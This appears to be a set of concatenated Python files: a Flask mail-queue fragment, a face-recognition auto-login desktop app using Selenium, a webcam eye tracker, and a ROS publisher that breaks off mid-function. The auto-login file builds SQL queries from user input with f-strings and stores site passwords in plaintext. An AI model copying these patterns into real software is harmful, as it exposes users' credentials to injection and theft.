self.email_class = self.email_class or email_class
if self.email_class is None:
class Email(db.Model, EmailMixin):
attachments = db.relationship(
Attachment,
secondary=db.Table(
"email_attachment",
db.Column(
"email_id",
db.Integer,
db.ForeignKey("email.id"),
primary_key=True
),
db.Column(
"attachment_id",
db.Integer,
db.ForeignKey("attachment.id"),
primary_key=True
)
),
backref="emails"
)
self.email_class = Email
self.app.register_blueprint(
Blueprint(
"mail",
__name__,
url_prefix='/mail',
template_folder="templates"
)
)
self.app.extensions["mail_alchemy"] = self
def send(self, msg: Message):
"""Sends a single message instance.
Stores messages in database and sends them. A separate message is stored
for every recipient in database. If TESTING is True the message will not
actually be sent.
Args:
msg: a Message instance.
"""
emails = self.email_class.from_message(msg)
for email in emails:
self.db.session.add(email)
self.db.session.commit()
for email in emails:
email.send()
self.db.session.commit()
def send_message(self, *args, **kwargs):
"""Shortcut for send(msg).
Takes same arguments as Message constructor.
"""
msg = Message(*args, **kwargs)
self.send(msg)
@staticmethod
def render_template(msg: Message, template: str, **context):
"""Renders plaintext and HTML content for Message.
Message body is set from template found with .txt ending, html is set
from template found with .html ending.
Args:
msg: Message instance
template: Template name without extension
**context: Template context
"""
try:
msg.body = render_template(
"mail/{}.txt".format(template),
**context
)
except FileNotFoundError:
pass
try:
msg.html = render_template(
"mail/{}.html".format(template),
**context
)
except FileNotFoundError:
pass
def attach_file(self, msg: Message, path: str):
"""Attach file to Message.
Args:
msg: Message instance
path: Path to file
"""
with self.app.open_resource(path) as f:
data = f.read()
content_type = mimetypes.MimeTypes().guess_type(path)[0]
msg.attach(
os.path.basename(path),
content_type=content_type or "application/octet-stream",
data=data
)
def schedule(self, msg: Message, scheduled_at: dt.datetime = None):
"""Schedules a single message instance to send in future.
Stores messages in database and sends them. A separate message is stored
for every recipient in database.
Args:
msg: Message instance
scheduled_at: Time of sending in future
"""
if scheduled_at is None:
scheduled_at = dt.datetime.utcnow()
for email in self.email_class.from_message(msg):
email.scheduled_at = scheduled_at
self.db.session.add(email)
self.db.session.commit()
def schedule_message(
self,
*args,
scheduled_at: dt.datetime = None,
**kwargs
):
"""Shortcut for schedule(msg).
Takes same arguments as Message constructor plus the `scheduled_at`
datetime parameter.
"""
msg = Message(*args, **kwargs)
self.schedule(msg, scheduled_at=scheduled_at)
def worker(self):
"""Sends unsent emails that are scheduled before current time."""
with self.app.app_context():
while not self.__stop_worker__:
self.email_class.send_scheduled()
tm.sleep(self.app.config.get("MAIL_ALCHEMY_CYCLE", 10))
def run_worker(self):
"""Starts worker thread."""
thread = th.Thread(target=self.worker)
thread.start()
def stop_worker(self):
"""Stops worker thread's loop."""
self.__stop_worker__ = True
|
main.py
|
# ///////////////////////////////////////////////////////////////
#
# BY: WANDERSON M.PIMENTA
# PROJECT MADE WITH: Qt Designer and PySide6
# V: 1.0.0
#
# This project can be used freely for all uses, as long as they maintain the
# respective credits only in the Python scripts, any information in the visual
# interface (GUI) can be modified without any implication.
#
# There are limitations on Qt licenses if you want to use your products
# commercially, I recommend reading them on the official website:
# https://doc.qt.io/qtforpython/licenses.html
#
# ///////////////////////////////////////////////////////////////
import sqlite3
import sys
import os
import platform
import threading
import cv2
import pyperclip
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
import time
# IMPORT / GUI AND MODULES AND WIDGETS
# ///////////////////////////////////////////////////////////////
import face_recognition
import numpy as np
from modules import *
from widgets import *
os.environ["QT_FONT_DPI"] = "96" # FIX Problem for High DPI and Scale above 100%
# SET AS GLOBAL WIDGETS
# ///////////////////////////////////////////////////////////////
widgets = None
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
# SET AS GLOBAL WIDGETS
# ///////////////////////////////////////////////////////////////
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
global face_locations
global face_names
global face_encodings
global widgets
global selected_name
global logined
logined = 0
widgets = self.ui
face_locations = []
face_encodings = []
face_names = []
selected_name = ''
# USE CUSTOM TITLE BAR | USE AS "False" FOR MAC OR LINUX
# ///////////////////////////////////////////////////////////////
Settings.ENABLE_CUSTOM_TITLE_BAR = True
# APP NAME
# ///////////////////////////////////////////////////////////////
title = "PyDracula - Modern GUI"
description = "FaceLink - 얼굴인식 자동로그인"
# APPLY TEXTS
self.setWindowTitle(title)
# TOGGLE MENU
# ///////////////////////////////////////////////////////////////
widgets.toggleButton.clicked.connect(lambda: UIFunctions.toggleMenu(self, True))
# SET UI DEFINITIONS
# ///////////////////////////////////////////////////////////////
UIFunctions.uiDefinitions(self)
# QTableWidget PARAMETERS
# ///////////////////////////////////////////////////////////////
# widgets.tableWidget.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# BUTTONS CLICK
# ///////////////////////////////////////////////////////////////
# LEFT MENUS
widgets.btn_home.clicked.connect(self.buttonClick)
widgets.btn_bookmark.clicked.connect(self.buttonClick)
widgets.function_button.clicked.connect(self.buttonClick)
widgets.complete.clicked.connect(self.buttonClick)
widgets.editbutton1.clicked.connect(self.buttonClick)
widgets.editbutton2.clicked.connect(self.buttonClick)
widgets.editbutton3.clicked.connect(self.buttonClick)
widgets.editbutton4.clicked.connect(self.buttonClick)
widgets.editbutton5.clicked.connect(self.buttonClick)
widgets.editbutton6.clicked.connect(self.buttonClick)
widgets.delbutton1.clicked.connect(self.buttonClick)
widgets.delbutton2.clicked.connect(self.buttonClick)
widgets.delbutton3.clicked.connect(self.buttonClick)
widgets.delbutton4.clicked.connect(self.buttonClick)
widgets.delbutton5.clicked.connect(self.buttonClick)
widgets.delbutton6.clicked.connect(self.buttonClick)
widgets.bookpage1.clicked.connect(self.link_bookmark)
widgets.bookpage2.clicked.connect(self.link_bookmark)
widgets.bookpage3.clicked.connect(self.link_bookmark)
widgets.bookpage4.clicked.connect(self.link_bookmark)
widgets.bookpage5.clicked.connect(self.link_bookmark)
widgets.bookpage6.clicked.connect(self.link_bookmark)
widgets.complete_2.clicked.connect(self.edit_bookmark)
widgets.logout.clicked.connect(self.buttonClick)
widgets.logout.clicked.connect(self.buttonClick)
# EXTRA LEFT BOX
# EXTRA RIGHT BOX
def openCloseRightBox():
UIFunctions.toggleRightBox(self, True)
# SHOW APP
# ///////////////////////////////////////////////////////////////
self.show()
# SET CUSTOM THEME
# ///////////////////////////////////////////////////////////////
useCustomTheme = False
themeFile = "themes\py_dracula_light.qss"
# SET THEME AND HACKS
if useCustomTheme:
# LOAD AND APPLY STYLE
UIFunctions.theme(self, themeFile, True)
# SET HACKS
AppFunctions.setThemeHack(self)
# SET HOME PAGE AND SELECT MENU
# ///////////////////////////////////////////////////////////////
widgets.stackedWidget.setCurrentWidget(widgets.home)
widgets.btn_home.setStyleSheet(UIFunctions.selectMenu(widgets.btn_home.styleSheet()))
global running
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
print("started..")
# BUTTONS CLICK
# Post here your functions for clicked buttons
# ///////////////////////////////////////////////////////////////
def run(self):
known_face_encodings = [np.load(f"./encodings/{path}") for path in os.listdir("./encodings")]
known_face_names = [os.path.splitext(path)[0] for path in os.listdir("./encodings")]
# Initialize some variables
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
widgets.camLabel.resize(640, 360)
global captured_img
global face_locations
global face_names
global face_encodings
process_this_frame = True
while running:
ret, img = cap.read()
small_frame = cv2.resize(img, (0, 0), fx=0.50, fy=0.50)
rgb_small_frame = small_frame[:, :, ::-1]
if process_this_frame:
last_locations = face_locations.copy()
last_names = face_names.copy()
last_encodings = face_encodings.copy()
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
if not len(face_locations):
face_locations = last_locations
face_names = last_names
face_encodings = last_encodings
else:
face_names = []
for face_encoding, i in zip(face_encodings, range(len(face_encodings))):
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
print(i, matches)
if True in matches:
print(-1)
face_names.append(known_face_names[matches.index(True)])
else:
face_names.append("Unknown");
print(face_names)
process_this_frame = not process_this_frame
for (top, right, bottom, left), name in zip(face_locations, face_names):
captured_img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 2
right *= 2
bottom *= 2
left *= 2
# Draw a box around the face
cv2.rectangle(img, (left, top), (right, bottom), (146, 101, 57), 2)
# Draw a label with a name below the face
cv2.rectangle(img, (left, bottom - 25), (right, bottom), (146, 101, 57), cv2.FILLED)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, name, (left + 6, bottom-5), font, 0.8, (255, 255, 255), 1)
img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)
img_converted = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
h, w, c = img.shape
qImg = QImage(img_converted.data, w, h, w * c, QImage.Format_RGB888)
pixmap = QPixmap.fromImage(qImg)
# draw rounded rect on new pixmap using original pixmap as brush
widgets.camLabel.setPixmap(pixmap)
cap.release()
def buttonClick(self):
# GET BUTTON CLICKED
global running
global face_locations
global face_names
global selected_name
global logined
btn = self.sender()
btnName = btn.objectName()
global btnNumber
try:
number = int(btnName[-1])
except:
number = 0
if btnName not in ["logout", "btn_home"]:
running = False
else:
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
# SHOW HOME PAGE
if btnName == "logout":
if logined == 0:
QMessageBox.about(self, "알림", "로그인 되어있지 않습니다.")
else:
face_locations = []
face_names = []
selected_name = ''
widgets.stackedWidget.setCurrentWidget(widgets.home)
QMessageBox.about(self, "알림", "로그아웃 되었습니다.")
if btnName == "btn_home":
widgets.stackedWidget.setCurrentWidget(widgets.home)
UIFunctions.resetStyle(self, btnName)
btn.setStyleSheet(UIFunctions.selectMenu(btn.styleSheet()))
elif btnName == "complete":
# user add start
uname = np.array(selected_encoding)
np.save(f"./encodings/{widgets.adduserName.text()}", uname)
ins = 'INSERT INTO student (name, ID, PW, url) VALUES(?, ?, ?, ?)'
for i, url in zip(range(1,7),
[
'https://eis.cbnu.ac.kr/cbnuLogin',
'https://www.naver.com/',
'https://www.instagram.com/',
'https://www.daum.net/',
'https://cbnu.blackboard.com/',
'https://everytime.kr/'
]):
curs.execute(ins, (widgets.adduserName.text()+str(i), '', '', url))
conn.commit()
print('데이터가 저장되었습니다.')
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
UIFunctions.resetStyle(self, "btn_bookmark")
widgets.btn_bookmark.setStyleSheet(UIFunctions.selectMenu(widgets.btn_bookmark.styleSheet()))
logined = 1
elif btnName == "function_button":
if selected_name == "Unknown":
widgets.stackedWidget.setCurrentWidget(widgets.add)
elif selected_name == "":
QMessageBox.about(self, "실패!", "얼굴 선택이 필요합니다.")
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
else:
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
logined = 1
UIFunctions.resetStyle(self, "btn_bookmark")
widgets.btn_bookmark.setStyleSheet(UIFunctions.selectMenu(widgets.btn_bookmark.styleSheet()))
elif btnName.find('edit') != -1:
btnNumber = number
print(btnNumber)
widgets.stackedWidget.setCurrentWidget(widgets.pageinfo)
UIFunctions.resetStyle(self, btnName)
elif btnName.find('del') != -1:
ins = f'SELECT * FROM student WHERE name = "{selected_name}{number}"'
curs.execute(ins)
rows = curs.fetchall()
if len(rows[0][1]):
ins = f'UPDATE student SET ID="", PW="" WHERE name = "{selected_name}{number}"'
curs.execute(ins)
QMessageBox.about(self, "성공!", "삭제하였습니다.")
else:
QMessageBox.about(self, "오류!", "존재하지않는 정보입니다.")
conn.commit()
# SHOW WIDGETS PAGE
elif btnName == "btn_bookmark":
if selected_name == '':
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
QMessageBox.about(self, "실패!", "로그인이 필요합니다.")
else:
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
UIFunctions.resetStyle(self, btnName)
btn.setStyleSheet(UIFunctions.selectMenu(btn.styleSheet()))
logined = 1
# AUTO LOGIN
def link_bookmark(self):
btn = self.sender()
btnName = btn.objectName()
number = int(btnName[-1])
print(selected_name)
# 자동화 로그인 하고 싶은 url 입력.
curs.execute(f'SELECT * FROM student WHERE name = "{selected_name}{number}"')
rows = curs.fetchall()
try:
if len(rows[0][1]):
for (name, ID, PW, url) in rows:
self.autologin(ID, PW, url)
else:
QMessageBox.about(self, "오류!", "수정 버튼을 눌러 등록해주세요!")
except:
QMessageBox.about(self, "오류!", "수정 버튼을 눌러 등록해주세요!")
def edit_bookmark(self):
btn = self.sender()
btnName = btn.objectName()
print(selected_name+str(btnNumber))
if len(widgets.adduserName_2.text()) and len(widgets.adduserName_3.text()):
ins = f'UPDATE student SET ID="{widgets.adduserName_2.text()}", PW="{widgets.adduserName_3.text()}" WHERE name = "{selected_name}{str(btnNumber)}"'
curs.execute(ins)
conn.commit()
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
UIFunctions.resetStyle(self, btnName)
btn.setStyleSheet(UIFunctions.selectMenu(btn.styleSheet()))
else:
QMessageBox.about(self, "오류!", "빈칸 없이 작성해주세요!")
# AUTO LOGIN EVENTS
def autologin(self, ID, PW, url):
driver = webdriver.Chrome('c:/informs/chromedriver.exe')
driver.implicitly_wait(3)
driver.get(url)
id = ID
pw = PW
# CBNU Blackboard
if url == "https://cbnu.blackboard.com/":
driver.find_element_by_name('uid').send_keys(id)
time.sleep(1)
driver.find_element_by_name('pswd').send_keys(pw)
time.sleep(1)
driver.find_element_by_xpath('//*[@id="entry-login"]').click()
# CBNU 개신누리
if url == "https://eis.cbnu.ac.kr/cbnuLogin":
time.sleep(1)
driver.find_element_by_name('uid').send_keys(id)
time.sleep(1)
driver.find_element_by_name('pswd').send_keys(pw)
time.sleep(1)
driver.find_element_by_xpath('//*[@id="commonLoginBtn"]').click()
# Daum
# ty 선택 카카오계정으로 로그인 OR 다음계정으로 로그인
if url == "https://www.daum.net/":
driver.get("https://logins.daum.net/accounts/ksso.do?url=https%3A%2F%2Fwww.daum.net%2F")
driver.find_element_by_name('email').send_keys(id)
time.sleep(1)
driver.find_element_by_name('password').send_keys(pw)
driver.find_element_by_class_name('btn_g').click()
# Instargram
if url == "https://www.instagram.com/":
driver.find_element_by_name('username').send_keys(id)
time.sleep(1)
time.sleep(1)
driver.find_element_by_name('password').send_keys(pw)
time.sleep(1)
driver.find_element_by_class_name('Igw0E').click()
# Naver
if url == "https://www.naver.com/":
time.sleep(1)
driver.get('https://nid.naver.com/nidlogin.login?mode=form&url=https%3A%2F%2Fwww.naver.com')
# 아이디 입력폼
tag_id = driver.find_element_by_name('id')
tag_pw = driver.find_element_by_name('pw')
tag_id.click()
pyperclip.copy(id)
tag_id.send_keys(Keys.CONTROL, 'v')
time.sleep(1)
tag_pw.click()
pyperclip.copy(pw)
tag_pw.send_keys(Keys.CONTROL, 'v')
time.sleep(1)
driver.find_element_by_id('log.login').click()
time.sleep(2)
# Everytime
if url == "https://everytime.kr/":
time.sleep(1)
driver.get("https://everytime.kr/login")
driver.find_element_by_name('userid').send_keys(id)
time.sleep(1)
driver.find_element_by_name('password').send_keys(pw)
time.sleep(1)
driver.find_element_by_class_name('submit').click()
# RESIZE EVENTS
# ///////////////////////////////////////////////////////////////
def resizeEvent(self, event):
# Update Size Grips
UIFunctions.resize_grips(self)
# MOUSE CLICK EVENTS
# ///////////////////////////////////////////////////////////////
def mousePressEvent(self, event):
# SET DRAG POS WINDOW
global face_locations
global face_names
global selected_encoding
global selected_name
self.dragPos = event.globalPos()
# PRINT MOUSE EVENTS
if event.buttons() == Qt.LeftButton:
print('Mouse click: LEFT CLICK')
if event.buttons() == Qt.RightButton:
print('Mouse click: RIGHT CLICK')
if running:
x = event.x() - widgets.camLabel.x() - widgets.leftMenuBg.width()
y = event.y() - widgets.camLabel.y() - widgets.contentTopBg.height()
for (top, right, bottom, left), name, encoding in zip(face_locations, face_names, face_encodings):
# top *= 2
# right *= 2
# bottom *= 2
# left *= 2
if (right >= x >= left) and (bottom >= y >= top):
print(name)
selected_name = name
slicedImg = captured_img[top:bottom, left:right]
slicedImg = cv2.cvtColor(slicedImg, cv2.COLOR_BGR2RGB)
h, w, c = slicedImg.shape
qImg = QImage(slicedImg.data, w, h, w * c, QImage.Format_RGB888)
pixmap = QPixmap.fromImage(qImg)
widgets.slicedPicture.setPixmap(pixmap)
widgets.selectedId.setText(QCoreApplication.translate("MainWindow", name, None))
selected_encoding = encoding
if name == "Unknown":
widgets.function_text.setText(QCoreApplication.translate("MainWindow", "회원가입", None))
else:
widgets.function_text.setText(QCoreApplication.translate("MainWindow", "로그인", None))
if __name__ == "__main__":
with sqlite3.connect('school.db') as conn:
curs = conn.cursor()
curs.execute('''CREATE TABLE IF NOT EXISTS student
(name VARCHAR(20) PRIMARY KEY, ID VARCHAR(20), PW VARCHAR(20), url VARCHAR(100))''')
app = QApplication(sys.argv)
app.setWindowIcon(QIcon("icon.ico"))
window = MainWindow()
sys.exit(app.exec())
conn.commit()
conn.close()
|
eye_tracker.py
|
"""
@title
@description
"""
import os
import threading
import time
import cv2
import dlib
import numpy as np
from auto_drone import DATA_DIR
def shape_to_np(shape, dtype='int'):
coords = np.zeros((68, 2), dtype=dtype)
for i in range(0, 68):
coords[i] = (shape.part(i).x, shape.part(i).y)
return coords
class EyeTracker:
FRAME_DELAY = 1
def __init__(self, log_dir: str, log_id=None, callback_list=None):
self.history = []
self.callback_list = callback_list if callback_list is not None else []
self.listen_thread = None
self.listening = False
self.webcam_index = 0
self.video_capture = cv2.VideoCapture(self.webcam_index)
self.detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor(
os.path.join(DATA_DIR, 'eye_tracking', 'shape_predictor_68_face_landmarks.dat')
)
self.video_writer = None
self.video_start_time = None
self.video_end_time = None
start_time = time.time()
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if log_id:
self.log_fname = os.path.join(log_dir, f'log_{log_id}_{start_time}.txt')
self.video_fname = os.path.join(log_dir, f'video_{log_id}_{start_time}.avi')
else:
self.log_fname = os.path.join(log_dir, f'log_{start_time}.txt')
self.video_fname = os.path.join(log_dir, f'video_{start_time}.avi')
return
def start_listener(self):
self.listen_thread = threading.Thread(target=self.__listen, daemon=True)
self.listen_thread.start()
return
def __listen(self):
if not self.video_capture.isOpened():
print(f'Could not open video stream')
return
print(f'Opened video stream: {self.webcam_index}')
# discard first read and make sure all is reading correctly
read_success, video_frame = self.video_capture.read()
if not read_success:
print(f'Error reading from video stream')
return
calibration_frame_count = 120
calibration_start = time.time()
for frame_idx in range(0, calibration_frame_count):
_, _ = self.video_capture.read()
calibration_end = time.time()
# save capture width and height for later when saving the video
fps = int(calibration_frame_count / (calibration_end - calibration_start))
frame_width = int(self.video_capture.get(3))
frame_height = int(self.video_capture.get(4))
print(f'Read frame from video stream\n'
f'FPS: {fps}\n'
f'Width: {frame_width}\n'
f'Height: {frame_height}')
codec_str = 'MJPG'
self.video_writer = cv2.VideoWriter(
self.video_fname, cv2.VideoWriter_fourcc(*codec_str),
fps, (frame_width, frame_height)
)
self.listening = True
self.video_start_time = time.time()
while self.listening:
ret, img = self.video_capture.read()
if ret:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
rects = self.detector(gray, 1)
for (i, rect) in enumerate(rects):
shape = self.predictor(gray, rect)
shape = shape_to_np(shape)
for (x, y) in shape:
cv2.circle(img, (x, y), 2, (0, 0, 255), -1)
self.video_writer.write(img.astype('uint8'))
cv2.imshow('EyeTracker', img)
cv2.waitKey(self.FRAME_DELAY)
self.history.append(img)
# # todo save to video
read_time = time.time()
for each_callback in self.callback_list:
if callable(each_callback):
each_callback({'timestamp': read_time, 'data': img})
self.video_end_time = time.time()
cv2.destroyAllWindows()
self.video_capture.release()
return
def stop_listener(self):
self.listening = False
return
def cleanup(self):
self.stop_listener()
self.listen_thread.join()
return
|
rosbag_api_recording_1_generate_output.py
|
#!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseArray
from sensor_msgs.msg import PointCloud
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
from sensor_msgs.point_cloud2 import create_cloud_xyz32
import threading
import rosbag
import rosgraph
try:
from queue import Queue
except ImportError:
from Queue import Queue
def parse_pointstamped(point_input):
"""
Parse point_input into PointStamped.
"""
try:
assert isinstance(point_input, PointStamped)
return point_input
except:
pass
try:
assert isinstance(point_input, Point)
point = PointStamped(point = point_input)
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
assert isinstance(point_input, Point32)
point = PointStamped(point = Point(x=point_input.x, y=point_input.y, z=point_input.z))
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
point = point_input
point = PointStamped(point = Point(x=point[0], y=point[1], z=point[2]))
point.header.stamp = rospy.Time.now()
return point
except Exception as e:
raise ValueError('Point not properly specified (should be Point, PointStamped or [3] list type)!')
def parse_posestamped(pose_input):
"""
Parse pose_input into PoseStamped.
"""
try:
assert isinstance(pose_input, PoseStamped)
return pose_input
except:
pass
try:
assert isinstance(pose_input, Pose)
pose = PoseStamped(pose = pose_input)
pose.header.stamp = rospy.Time.now()
return pose
except:
pass
try:
pose = pose_input
position = Point(x=pose_input[0][0], y=pose_input[0][1], z=pose_input[0][2])
orientation = Quaternion(x=pose_input[1][0], y=pose_input[1][1], z=pose_input[1][2], w=pose_input[1][3])
pose = PoseStamped(pose = Pose(position=position, orientation=orientation))
pose.header.stamp = rospy.Time.now()
return pose
except Exception as e:
raise ValueError('Pose not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
def parse_posearray(posearray_input):
"""
Parse posearray_input into a PoseArray.
"""
try:
assert isinstance(posearray_input, PoseArray)
return posearray_input
except:
pass
try:
assert isinstance(posearray_input, list)
posearray = PoseArray()
for pose in posearray_input:
try:
assert isinstance(pose, Pose)
posearray.poses.append(pose)
continue
except:
pass
try:
assert isinstance(pose, PoseStamped)
posearray.poses.append(pose.pose)
continue
except:
pass
try:
position = Point(x=pose[0][0], y=pose[0][1], z=pose[0][2])
orientation = Quaternion(x=pose[1][0], y=pose[1][1], z=pose[1][2], w=pose[1][3])
pose = Pose(position=position, orientation=orientation)
posearray.poses.append(pose)
continue
except Exception as e:
raise ValueError('Pose in pose array input not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
posearray.header.stamp = rospy.Time.now()
return posearray
except Exception as e:
raise ValueError('Pose array not properly specified (should be PoseArray or list of Pose, PoseStamped or [[3],[4]] list types)!')
def parse_pointcloud(pointcloud_input):
"""
Parse pointcloud_input into PointCloud.
"""
try:
assert isinstance(pointcloud_input, PointCloud)
return pointcloud_input
except:
pass
try:
points = pc2.read_points(pointcloud_input, skip_nans=True, field_names=('x', 'y', 'z'))
return PointCloud(points = map(lambda point: Point32(*point), points))
except Exception as e:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type): ' + repr(e))
def parse_pointcloud2(pointcloud_input):
"""
Parse pointcloud_input into PointCloud2.
"""
try:
assert isinstance(pointcloud_input, PointCloud2)
return pointcloud_input
except:
pass
try:
points = [[point.x, point.y, point.z] for point in pointcloud_input.points]
pointcloud2 = create_cloud_xyz32(header=pointcloud_input.header, points=points)
return pointcloud2
except:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type)!')
class MsgPublisher(object):
"""
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
except:
rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
except:
rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
except Exception as e:
del self._pub_rates[topic]
self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
for topic in self._pubs.keys():
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
class PublishMsgState(smach.State):
def __init__(self, name, msg_publisher, action, input_keys = ['msg', 'topic', 'rate'], output_keys = ['msg', 'topic'], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the MsgPublisherObserver object reference
self._msg_publisher = msg_publisher
# Save the action
self._action = action
# Set up dict of parsing functions for certain message types/classes.
self._msg_parsers = {"<class 'geometry_msgs.msg._Point.Point'>": parse_pointstamped,
"<class 'geometry_msgs.msg._PointStamped.PointStamped'>": parse_pointstamped,
"<class 'geometry_msgs.msg._Pose.Pose'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseStamped.PoseStamped'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseArray.PoseArray'>": parse_posearray,
"<class 'sensor_msgs.msg._PointCloud.PointCloud'>": parse_pointcloud,
"<class 'sensor_msgs.msg._PointCloud2.PointCloud2'>": parse_pointcloud2}
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def _parse_msg(self, msg, msg_type=None):
# First try using a known parser for a specified msg_type.
try:
assert msg_type
msg_class = str(roslib.message.get_message_class(msg_type))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try to select a known parser by checking the type of message.
try:
msg_class = str(type(msg))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try each message type parser in succession and see if something sticks.
for _, parser in self._msg_parsers.items():
try:
published_msg = parser(msg)
return published_msg
except:
pass
# Finally, if none of the above stuck, just return the original message.
return msg
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Start or stop the message publisher
outcome = 'aborted'
if self._action == 'start':
# Parse msg
try:
if 'msg_type' in self._input_keys:
published_msg = self._parse_msg(userdata.msg, msg_type=userdata.msg_type)
else:
published_msg = self._parse_msg(userdata.msg)
except Exception as e:
rospy.logerr('Failed to parse message: '.format(repr(e)))
return 'aborted'
# Get topic if it's specified as an input key
if 'topic' in self._input_keys:
topic = userdata.topic
# Otherwise, construct it from the state name
else:
topic = 'smacha/' + self._name.lower()
# Get rate if it's specified as an input key
if 'rate' in self._input_keys:
rate = userdata.rate
else:
rate = 100.0
# Get callback if it's specified as an input key
if 'callback' in self._input_keys:
